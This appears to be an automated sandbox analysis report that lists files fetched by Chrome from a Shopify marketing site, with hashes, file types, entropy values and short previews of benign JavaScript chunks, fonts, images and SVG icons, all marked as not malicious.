                                                                    Category:downloaded
                                                                    Size (bytes):27449
                                                                    Entropy (8bit):5.573527076544105
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:86973A1B7C0FEF8BE82E7D2A3D1704F0
                                                                    SHA1:F26D40AE3F470F3FACCC9A63BB13CEB58F34A386
                                                                    SHA-256:7E346B9D64EF5B839E4CD08CCFB514C4B2F232B57F708FD5F4D3092164591CD4
                                                                    SHA-512:F3B9965723F6C350F4E5689E25BCDFE61764B0950CF551AA597BF3D41A969C0D8422E7C843616B94B36B08D4C72FB8C03212AAB285F8207C93FB612C3A4D43EE
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-MAVCSIGR.js
                                                                    Preview:import{a as we}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XJAW7GJS.js";import{a as Se}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-JKCUGZSP.js";import{a as xe}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-UGLZPHL3.js";import{a as Ne}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-PT2PVC5H.js";import{a as S}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-SDWEBNFN.js";import{a as W}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-5FZGJS6G.js";import{a as T}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-SWIYBLVM.js";import{c as ke}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-5MDR4ZDZ.js";import{a as ve}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-MOSJSY7P.js";import{c as ye,d as be}from"htt
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (526)
                                                                    Category:downloaded
                                                                    Size (bytes):527
                                                                    Entropy (8bit):5.143260702461544
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:7EA98166D2557DD9A846121CB9F1D17B
                                                                    SHA1:D1356F7A7FB2836BE430552CF4EB560C579E536E
                                                                    SHA-256:6CDB2B9FBEA5557325BA8DAC7A34A0CAADB25D57719BFC34C88F1CD4F538C9C1
                                                                    SHA-512:51165586268EE84C65DC0FE70D1A2BC51FFF45E93F9DEA89CF266F608C9CE2685F7E053A4C688860B0ED672B246E974094E1A2ACD4395AF78327DF30A7E3CF32
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-QBKJCLV2.js
                                                                    Preview:import{a as o}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as s}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var r=s(o()),b=(n,t)=>{let u=t?.current,e=(0,r.useRef)(null),c=(0,r.useCallback)(()=>{t?.current&&e?.current&&e.current.observe(t.current)},[t]);(0,r.useEffect)(()=>(e?.current&&u&&e.current.unobserve(u),e.current=new ResizeObserver(n),c(),()=>{e?.current&&u&&e.current.unobserve(u)}),[n,u,t,c])};export{b as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:C source, ASCII text, with very long lines (4413)
                                                                    Category:downloaded
                                                                    Size (bytes):6475
                                                                    Entropy (8bit):5.6102510992006565
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:D1D6F433C5D9B9517645AC8C17BA29DE
                                                                    SHA1:073B3185405899DE4049512314065CC4A3AE8E8A
                                                                    SHA-256:A3ADB75CA760C3A644F5AF532ED28C37BA79705EECB78EA47D600D2774353A94
                                                                    SHA-512:B69342368CF11D759C0DCE968EEA538FE21ABCA3583B9DA52C80761871B3B1879E6FD05D28773160F4FE62D7BAA950EEF590B4028CA13588F3E8635EDB6878F3
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-LPQ43SSK.js
                                                                    Preview:function U(n,l,g,d){return new(g||(g=Promise))(function(o,s){function f(e){try{i(d.next(e))}catch(t){s(t)}}function u(e){try{i(d.throw(e))}catch(t){s(t)}}function i(e){var t;e.done?o(e.value):(t=e.value,t instanceof g?t:new g(function(c){c(t)})).then(f,u)}i((d=d.apply(n,l||[])).next())})}var J=["geforce 320m","geforce 8600","geforce 8600m gt","geforce 8800 gs","geforce 8800 gt","geforce 9400","geforce 9400m g","geforce 9400m","geforce 9600m gt","geforce 9600m","geforce fx go5200","geforce gt 120","geforce gt 130","geforce gt 330m","geforce gtx 285","google swiftshader","intel g41","intel g45","intel gma 4500mhd","intel gma x3100","intel hd 3000","intel q45","legacy","mali-2","mali-3","mali-4","quadro fx 1500","quadro fx 4","quadro fx 5","radeon hd 2400","radeon hd 2600","radeon hd 4670","radeon hd 4850","radeon hd 4870","radeon hd 5670","radeon hd 5750","radeon hd 6290","radeon hd 6300","radeon hd 6310","radeon hd 6320","radeon hd 6490m","radeon hd 6630m","radeon hd 6750m","radeon hd 6
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 36576, version 1.0
                                                                    Category:downloaded
                                                                    Size (bytes):36576
                                                                    Entropy (8bit):7.99424393925359
                                                                    Encrypted:true
                                                                    SSDEEP:
                                                                    MD5:A10562F55AED7249C4D9DD2C1D54E620
                                                                    SHA1:13286F694FADA8B6EE1C1E33EE58AE61C011A384
                                                                    SHA-256:5E273EBBCE9D731A467A1BD375E7084D94ED8FACE2FACFD33018C31E268683BD
                                                                    SHA-512:12850F7C457F8209ADA45B7B7A7C87540D493BAF60EA1AECC006570466A24FF438BA774C1E2F49FBFE4281B8002A98D8901F6DCA6883ADF0780B1DB378E515B7
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/static/fonts/ShopifySans--medium.woff2
                                                                    Preview:wOF2..................|..........................."....`..`..0.z..s.....|..u.....6.$..0. .....U..J[....r.%.A<..V.....E....7.Jro_..b.M...#...........'.9.......J.m..ML&.n...P:.}...Pl.9..4g..Zl.?.....bE...[.6..JT\.....o..j(P...[......'9.^..o6.D.N.6........|..u.....Xd#.f.b......[.@..Osq.>F.v^..#..Pca..~"em.4q.$z...:..=)fZ.=q......=..2d+dr.0..N.V...zXm:`E......E...p.>.K.Z[aV.lv."2.Qss.7....5..:......V...'...h...m.K.....}...g=.Na9..d)}.......?M.[..e..,...`$+G...'*.~.{$..|d\"<m....L8G....>.... }....@...!...RqJ..w.q\?....R3*J.cV..8P.........SU.H.*..........M..t_....>..3k.w...L..>S{.....B..ONy.?N.,.*Q*...K.....x.n..Le...|..V..U...0.33H.....@.~.Z...N.}..n....2.A..1..~..&......Y.._}.Q..O+..N@..1f4nFc..R..s...t).......u...<......l' ]@.Qt.%..6.Y....O"Q.1?.)P.L.......(..1...u..@||.M..$......;v....K...DN)..J..M]>. ...K..........mc;.h.a.Z......./..liw.W..).. ......tz.....B.l....(.`..)=.h.\.....E.Y..... j,.]..I>..J..T5R.......!..wo}...$..*..M/.....v..vs....L.n
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (9481)
                                                                    Category:downloaded
                                                                    Size (bytes):9482
                                                                    Entropy (8bit):4.6583093302051966
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:2200259C00369F329612EF7A3C7FD01F
                                                                    SHA1:9ED68AB624CCD1371BA88ECA01906FCBF82A2F23
                                                                    SHA-256:C3FBEB0C89E772226FCAB4C9BED3A168E8E1DA5F8186A0E96CF25749F58A9970
                                                                    SHA-512:06BD30B5DA0A5183D08BBFA146D5D6633F987F31410B71CFAD4D9527D24D0D58D35F2E4AA4B2AF309631C53A48F7B6EAD557A0355B530995C5D1743CB4B4B37B
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-R6P7ABP7.js
                                                                    Preview:import{X as s,ba as n}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-BK6DPWKP.js";import{a as h}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as a}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var l=a(h());function v(){return(0,l.jsxs)("svg",{viewBox:"0 0 608 173.7",role:"img","aria-label":"Shopify",children:[(0,l.jsx)("title",{children:"Shopify"}),(0,l.jsx)("path",{fill:"#95BF47",d:"M130.7 32.9c-.1-.9-.9-1.3-1.5-1.4-.6-.1-12.6-.2-12.6-.2s-10.1-9.8-11.1-10.8-2.9-.7-3.7-.5c0 0-1.9.6-5.1 1.6-.5-1.7-1.3-3.8-2.4-5.9-3.6-6.9-8.8-10.5-15.2-10.5-.4 0-.9 0-1.3.1-.2-.2-.4-.4-.6-.7-2.8-3-6.3-4.4-10.5-4.3-8.2.2-16.3 6.1-23 16.7-4.7 7.4-8.2 16.7-9.2 23.9-9.4 2.9-16 4.9-16.1 5-4.7 1.5-4.9 1.6-5.5 6.1C12.4 55.3 0 151.4 0 151.4l104.1 18 45.1-11.2S130.8 33.7 130.7 32.9zm-39.2-9.7c-2.4.7-5.1 1.6-8.1 2.5-.1-4.1-.6-9.9-2.5-14.9 6.3 1.2 9.3 8.2 10.6 12.4zM78 27.4c-5.5 1.7
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x43, components 3
                                                                    Category:downloaded
                                                                    Size (bytes):1863
                                                                    Entropy (8bit):7.686123675032971
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:D1B49DC9711E29EBA35CE84C46D63E49
                                                                    SHA1:5169C5517F82B4D781EFDB856EA885EE48D8C37F
                                                                    SHA-256:BA700401C6E365B9B24D201F4A51BA5EB0844E1CB3A7A2CEF7E15D1342F47B8C
                                                                    SHA-512:C07217EF389EB3344C49EE97D587E5EBCE1B191C094CDBBFE242587315A99B082AEA3572BBECFE9BF308FB4C9DC3391E66F843E3F1F0B64EF1AAD4F52F1DDA6D
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://fast.wistia.com/embed/medias/196cp7hnm6/swatch
                                                                    Preview:......JFIF.............C....................................................................C.......................................................................+.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....($....j..ax.k.T..cyX...w..P.<.M^Ry5.....)....s.X.|'.K..:df......m...F...,....OS....A..&....z..L.7.e8.&...U.Z\..y.MsB7.,$......{./.F.3.Z.J....;{.7ey..h..%..M....T..b.:........y..Hd.&...U|.5....\....c...#..?....?.r..SCo.\\..y9...NjYu..X.q.C......|.GG..?..N]W<.?.r.jn.C.q.=.O..-..Q.n..R..:.mG'.f...f.;..c...I.O..Z......c....P.+.....).?t.=.n .}.Fk.._..t...l
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (548)
                                                                    Category:downloaded
                                                                    Size (bytes):549
                                                                    Entropy (8bit):5.290067268930885
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:0195875FD8A2DAE1792244E74E1D30FB
                                                                    SHA1:CB91AF26ACDAB70A121825061E61334CD42BAFC9
                                                                    SHA-256:08A86E211162B9B89E51AD8EEA4D73C0409A781580D75D30CF33487440D01741
                                                                    SHA-512:8F36436EA48208DF33511632D5064D88BEE21A1471D5BC626CCA953B9EE5C43304817D9F8B3B6BAAB4B75A74567A8EAF5DC8EA08479CBAF5103F4BFDDF2F1170
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-NXLQIWVT.js
                                                                    Preview:import{a as u}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as a}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var t=a(u()),c=(o=!0)=>{let[d,n]=(0,t.useState)(o);function r(e){n(e.target.matches)}return(0,t.useEffect)(()=>{let e=window.matchMedia("(prefers-reduced-motion: reduce)");if(window.REDUCE_MOTION)n(!0);else if(e)return n(e.matches),e?.addEventListener?.("change",r),()=>e?.removeEventListener?.("change",r)},[]),d},i=c;export{i as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (791)
                                                                    Category:downloaded
                                                                    Size (bytes):792
                                                                    Entropy (8bit):5.166215397698753
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:96AFF780B55C1A89CC247445C49B2B43
                                                                    SHA1:92B02D00A58A8CF0127A59C5AE41EE919697C2E0
                                                                    SHA-256:2F754340511E1C8F257FCD7A783DACF64D2E9AD6389C3B2E634E88475214B363
                                                                    SHA-512:7AF584D50FCB4885CFDC2B6ED0B0FDB77B66C98E112E03928C696759331C71917C349E2B28901A4741E081BF18D985D8EB833217818AB815E6C3BAAA7389BDF8
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-LO4FJPJR.js
                                                                    Preview:import{a}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-N56232H5.js";import{b as n}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as o}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var s=o(r());function y({className:p="",children:l,componentName:m="button",href:i,intent:f,mode:e,size:c,target:t,external:d=!1,border:b=!0}){let u=a({intent:f,mode:e,size:c,border:b});return(0,s.jsx)("a",{href:i,className:n(u,p),"data-component-name":m,"data-mode":e,...d?{target:"_blank",rel:"noopener noreferrer"}:{},...t?{target:t}:{},children:l})}export{y as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (698)
                                                                    Category:downloaded
                                                                    Size (bytes):699
                                                                    Entropy (8bit):5.203833099068849
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:49CEC421D11D69C77025F208DA946C7C
                                                                    SHA1:540591A5D9861EFAD41B8D1820B12ACB8F05085F
                                                                    SHA-256:C599584485C93ED906F453EB0948B5EDEFCE7F85C8C88BC97369053D347E4270
                                                                    SHA-512:2310AA3462C65935420C0F72F4E9C2A4BCAFAE65B615860966E128A80A51B3E74FEFCC7D2565AF4AE1BE8982D506B80431D03FEA5C0FF1D472937C7D08369A90
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-2CMHK44O.js
                                                                    Preview:import{a as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-GF3AKGJL.js";import{b as s}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as t}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var o=e(t());function l({children:a,className:p,as:i="p",size:c="base"}){let n="kicker",m={className:s({lg:"text-t7",base:"text-t8",sm:"text-sm"}[c],"uppercase font-bold leading-none",p),as:i,children:a,componentName:n,isRichtext:!1};return(0,o.jsx)(r,{...m})}export{l as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ISO Media, AVIF Image Sequence
                                                                    Category:dropped
                                                                    Size (bytes):598762
                                                                    Entropy (8bit):7.994758319380065
                                                                    Encrypted:true
                                                                    SSDEEP:
                                                                    MD5:288AA2D76B4E7AAFF082AF1EB4279091
                                                                    SHA1:F9351F1121F3467320CA17084F80B01C32CA072D
                                                                    SHA-256:65B00979F9F4CB346D33A1A9EB7884E2609BB021FC76B3AC15C8262F2BB0B197
                                                                    SHA-512:EB2ADAFC81D5487770003D05185E9ECC388B5AA2A1E8EC922ABE2BDC4CEDD34F2464A27B56EF303FCF04CC8F25475AEC30A20634A9066F3EAADDD47EE16E3FB4
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:...,ftypavis....avisavifmsf1iso8mif1miafMA1B....meta......./hdlr........pict............PictureHandler.....pitm..........iloc....D...............@....(iinf..........infe........av01Color....jiprp...Kipco....ispe...........8....pixi............av1C..L.....colrnclx...........ipma...................moov...lmvhd..................'.................................................@...................................trak...htkhd....................................................................................@........8.....$edts....elst..........'............ymdia... mdhd..............].....U....../hdlr........pict............PictureHandler...."minf....vmhd...............$dinf....dref............url ........stbl....stsd............av01...........................8.H...H................................................av1C..L.....pasp............ccst....|.......stts....................stss....................stsc........................stsz..............@............................a..........
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, ASCII text, with very long lines (3448)
                                                                    Category:downloaded
                                                                    Size (bytes):3449
                                                                    Entropy (8bit):5.375293456023326
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:78A60CE1356670256A84F042D6B9F12F
                                                                    SHA1:3354D1C6F56FD2974247DB80024BD9F3C26B7B4E
                                                                    SHA-256:BB8620DCF2EB96FB356499A3EA61C155B06ECBE01AF5D32A710910FD8E15BFE6
                                                                    SHA-512:FE9009F19FECD0DC6CB3FDCF43913368A47E7CF51CB58421E741A97644E0EE75905528CEA6CDE686A695E6D1CC2492B871B1554777D2968B68BC536F45108457
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-ZPNA2BVT.js
                                                                    Preview:import{a as m}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-K3FMO2M6.js";import{a as t}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-L3M65SDF.js";import{a as h}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TZCLUSIF.js";import{b as a}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3HQUNPWN.js";import{a as o}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-AEETYEVW.js";import{a as l,b as c}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-5LSG7SHH.js";import{g as u}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-7DGIB4XT.js";import{b as g}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-RMCHIY3Z.js";import{a as d}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-PD2NQNQL.js";import{c as s,i as n}from"http
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (1965)
                                                                    Category:downloaded
                                                                    Size (bytes):1966
                                                                    Entropy (8bit):5.322689260813407
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:A07505D9C6002B40A2DE2A6211A43842
                                                                    SHA1:A74305B226286CBC6B9129501C21A0E5035E5A35
                                                                    SHA-256:6A13D1D5CF6E7AE4D4E72B2550B2712C350B61A25ED74CAD1DF0C5504A86D366
                                                                    SHA-512:3D9F07414D8E3DA2781DEA386021859FAF5228362347C0C067A5F73FC8FB0E9F92BF53C67B394862FC0C04DDDFB9F2AAD3A9E212B702C7A1BE7059C6BC057DC5
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3D2LATV4.js
                                                                    Preview:import{b as d}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-RCEKJ4KJ.js";import{a as c}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-NTXJAFG3.js";import{b as a}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-O6AAYXW4.js";import{b as i}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as l}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as n}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var t=n(l()),w=a(["rounded-full bg-black duration-150 transition-colors"],{variants:{outline:{true:"bg-transparent border-2",false:"bg-black text-white hover:bg-shade-70 active:bg-shade-50"},size:{small:"w-11 h-11",large:"w-16 h-16 md:w-24 md:h-24"},mode:{light:"disabled:bg-shade-30",dark:"disabled:bg-shade-70"}},compoundVariants:[{mode:"light",outline:!0,
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):385
                                                                    Entropy (8bit):5.138121695779221
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:746C3FCD7231FD04D765DBDAAACD2F42
                                                                    SHA1:90B27C1130ABC1CBA3E51AE409C0132C81F208EE
                                                                    SHA-256:82BDBE630A35CA679000D2177F4E32D44B5455E906F0A7FF628C3EADBEE38C8E
                                                                    SHA-512:F99ADC0317850BFFDF57781208C61EDE116E2F92CCF9EFD676FCBD83FAFBF453CF243D4980CCDF147CD017F92D8BDEB2012B911D6106F42DEC0322EC965B9BED
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<circle cx="24" cy="24" r="24" fill="#FEF6F4"/>.<circle cx="24" cy="24" r="17" fill="#FFE9E9"/>.<path d="M27.75 20.75L31.25 24L27.75 27.25M20.25 20.75L16.75 24L20.25 27.25M25.25 17.75L22.75 30.25" stroke="#D73E3E" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"/>.</svg>.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows icon resource - 1 icon, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                                                    Category:dropped
                                                                    Size (bytes):4543
                                                                    Entropy (8bit):7.720757602276575
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:1593F14650E4B3934D2A6B46D844E906
                                                                    SHA1:9FC6A2A70DAF3FB400C2F63D272EA313926226F8
                                                                    SHA-256:6CBAD9DE243DBAE308677D167CE099BA8D350EFCDF371A09753BB371874CA118
                                                                    SHA-512:2BAF05F0899C92B8B00338712928D16D5F751C328831B415DDD62ADD1BC2F61F7A954C9986629646BF94C46F03F606B070E6816C9B5CDD6AF3BB058138C6A5D8
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:............ ..........PNG........IHDR.............\r.f...pIDATx..O.dg..g.....W...$..d!.r%.....D.u..d..a..l..I$.q.....(.P...4."dQ.s..V.T.=....{...xI........?.9..........O?x.~}.....}}..'7.>|rs....7...?w_.........O..?.]. (~t......Wd..__.F.=).0.\...D...7..v..$..O.=<...gx..p..w.}+.?q.*..../.n...._....r....l...o..8.3...`.8...o`.....B1xW.......w%..2.R........ ....q*...A.....5..1.$..(zM...L..o.qN4z=v.m,c]$..'.....4.).._.6.v.G8K%.%0"<.`..).Y3.@........f.M""5.......sb.NL.:.76$....[.1...7#..c]...$.'..C..Z7g.._ .7.P .P...wD.<.;o...-......ldh..O.(....h....Ae.BR.F|K.......e ...6.5~..c..T.~.g.?...8.... (..a...9.?6...&..).).?nLuC$.....V}..bn..N4{.....y.C.7.s....B!.;....+...|.....0.I...s.5...{....]...p.`lh.VB..\..U.P.....w..%.8..*....S...!P..oq....F.%......O. ...".g.a....y........@.X.~C......f.C....U8DE...5.o..[.j..a..X.........+.......n.?.9....K".[..V....m...k13.D4..k.A..d:....s.3......(...|......l.S.{....:.....3..f!.Cc.7...u|..Ww_{.s..|.SJ.`....z..Zv....
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):5508
                                                                    Entropy (8bit):4.389824934128753
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:A5338C3F79A6E291B743E0149035A5FA
                                                                    SHA1:F4677E08E454ECC9E7153DAEBD8701C2C38A9F71
                                                                    SHA-256:BC98EE0CF7EF6F29A8F4C521C48591EBE6F60F084FB3B370C9F3D5F93CAA0B72
                                                                    SHA-512:8C191FA51C1B598C25D9C42CA8FFF3620EDC51AAE8A5698D1F188C7CA7633EACA5453A83C0B851964C4EEBDB8BE02D51EEB7860C2FB6B0B42B83C0DA313D9971
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="153" height="63" viewBox="0 0 153 63" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="0.5" width="152" height="62" rx="7.28777" fill="white" stroke="url(#paint0_radial_1397_6435)"/>.<g clip-path="url(#clip0_1397_6435)">.<path fill-rule="evenodd" clip-rule="evenodd" d="M78.6423 20.8684V20H72.1581V20.9263H69.437V21.7368H66.716V22.6632H63.937V23.5895H63.0686V25.3263H64.0528V26.3684H65.7897V28.1632H64.9213V30.0158H64.0528V32.7368H63.1844V35.4579H62.6055C62.316 35.4579 62.2581 35.5737 62.2581 35.8053V37.3105H61.3318V40.0316H60.4634V41.7684H69.5528V40.9H71.4055V40.0316H73.2581V39.1053H75.0528V38.1789H75.9792V37.3684H76.9055V39.1053H80.5528V38.2368H84.2002V37.3684H86.9213V36.4421H88.716L88.7739 35.5737H89.6423V37.3684H88.7739V39.1053H93.3476V37.3684H94.2739V35.5158H95.1423V34.6474H96.0686V33.7211H96.9949V32.7368H99.716V39.9737H101.569V39.1053H102.437V37.3684H101.569V35.5158H102.495V31.8684H103.363V31H104.29V32.4474C104.29 32.7368 104.29 32.8526 104.637 32.7947H105
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (1787)
                                                                    Category:downloaded
                                                                    Size (bytes):1788
                                                                    Entropy (8bit):5.448624186406632
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:0AEFDE34F2E902BA69D0B883B7D19C8C
                                                                    SHA1:BECD15EC50070C51E77C4678543B5D8A74DF4C9A
                                                                    SHA-256:D5356BFB689847C114586E93CD0F7C056014370B6331AB147D72F2EA859B4F14
                                                                    SHA-512:3273EA51FCC2BF472B2CE7805B82124FAED22336A2968419895221564B2472E56A4F46BAEB593A427B84BED4D0F38882C7A224E8C9B3827C7AB30526421EAB7C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TBYT574J.js
                                                                    Preview:import{a as o}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as b}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var a=b(o()),r=E=>{let{vertical:_,experimentVariationId:t}=E||{};return{vertical:_,experimentVariationId:t}},n=(0,a.createContext)({});function f(){return(0,a.useContext)(n)}var p=E=>{let{experimentVariationId:_=""}=f();if(!_)return!1;let t=_.split(",").find(e=>{let[c]=e.split(":");return c===E});if(t){let[,e]=t.split(":");return e==="true"}return!1};var A=E=>{let{experimentVariationId:_=""}=f();if(!_)return;let t=_.split(",").find(e=>{let[c]=e.split(":");return c===E});if(t){let[,e]=t.split(":");return e&&e!=="null"?e:void 0}};var L="e_6b9eae4e8bdd5bd7dfc1488c911eead7",O="e_a2731f189682c200baee9f805cf83ce7",s="e_346e4a7ddc082218da09e88a6adbdee5",N="e_0a4f42359e5bca26be43ff09681ace9b",i="e_37c5da2515e9f9986fbb8035553d2126",x="e_0a4da4809a7bdc36a0469a5f8586961b",S="e_87a6bf7a5
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (1141)
                                                                    Category:downloaded
                                                                    Size (bytes):1142
                                                                    Entropy (8bit):5.207698399419402
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:D570DD1B22A238029BC3AD2900D1CFE8
                                                                    SHA1:668FC6CD6218A97945F5EE58146AD7DA10958B96
                                                                    SHA-256:3F0CCE440188A6689B14B395E0A4323CF58680D125A77E1B1DD870D552DD6086
                                                                    SHA-512:E7FF725783655B74305A978174ED284C2B014ADBE4BF0661E1E08AB1A72AFA66947E84F6CC0427990FDB130D4618E083AE75B7126A70157ABD5951C7820DA2E7
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-GEUHE6KC.js
